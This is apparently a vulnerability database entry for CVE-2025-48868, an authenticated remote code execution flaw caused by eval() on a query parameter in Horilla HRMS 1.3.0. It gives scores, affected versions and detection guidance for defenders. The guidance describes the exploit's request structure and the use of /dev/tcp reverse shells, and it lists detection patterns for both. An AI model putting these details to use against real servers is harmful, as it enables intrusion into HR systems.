cbcvebase.
CVE-2025-48868
published 2025-09-24

CVE-2025-48868: Horilla is a free and open source Human Resource Management System (HRMS). An authenticated Remote Code Execution (RCE) vulnerability exists in Horilla 1.3.0…

PriorityP258high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
2.33%
81.4th percentile
Horilla is a free and open source Human Resource Management System (HRMS). An authenticated Remote Code Execution (RCE) vulnerability exists in Horilla 1.3.0 due to the unsafe use of Python’s eval() function on a user-controlled query parameter in the project_bulk_archive view. This allows privileged users (e.g., administrators) to execute arbitrary system commands on the server. While having Django’s DEBUG=True makes exploitation visibly easier by returning command output in the HTTP response, this is not required. The vulnerability can still be exploited in DEBUG=False mode by using blind payloads such as a reverse shell, leading to full remote code execution. This issue has been patched in version 1.3.1.

Affected

2 ranges
VendorProductVersion rangeFixed in
horilla-opensourcehorilla
horillahorilla

Detection & IOCsextracted from sources · hover to see the quote

otheris_active=<eval_payload>
  • Monitor HTTP POST requests to the project-bulk-archive endpoint containing suspicious characters in the `is_active` query parameter, especially shell metacharacters, backticks, or encoded command injection sequences (e.g., %26, /dev/tcp/).
  • Alert on outbound TCP connections from the web server process (e.g., Python/Django worker) to unexpected external IPs/ports, indicative of a reverse shell spawned via /dev/tcp.
  • Detect exploitation attempts in DEBUG=False (blind RCE) mode by monitoring for reverse shell callbacks from the Horilla server, as no output is returned in the HTTP response.
  • Flag POST requests to the bulk-archive view that include both a `csrfmiddlewaretoken` and an `ids` body parameter alongside a suspicious `is_active` query string — this matches the exploit's exact request structure.
  • ·Exploitation requires an authenticated session (privileged user, e.g., administrator). Detection rules should account for valid session cookies/CSRF tokens being present in malicious requests.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.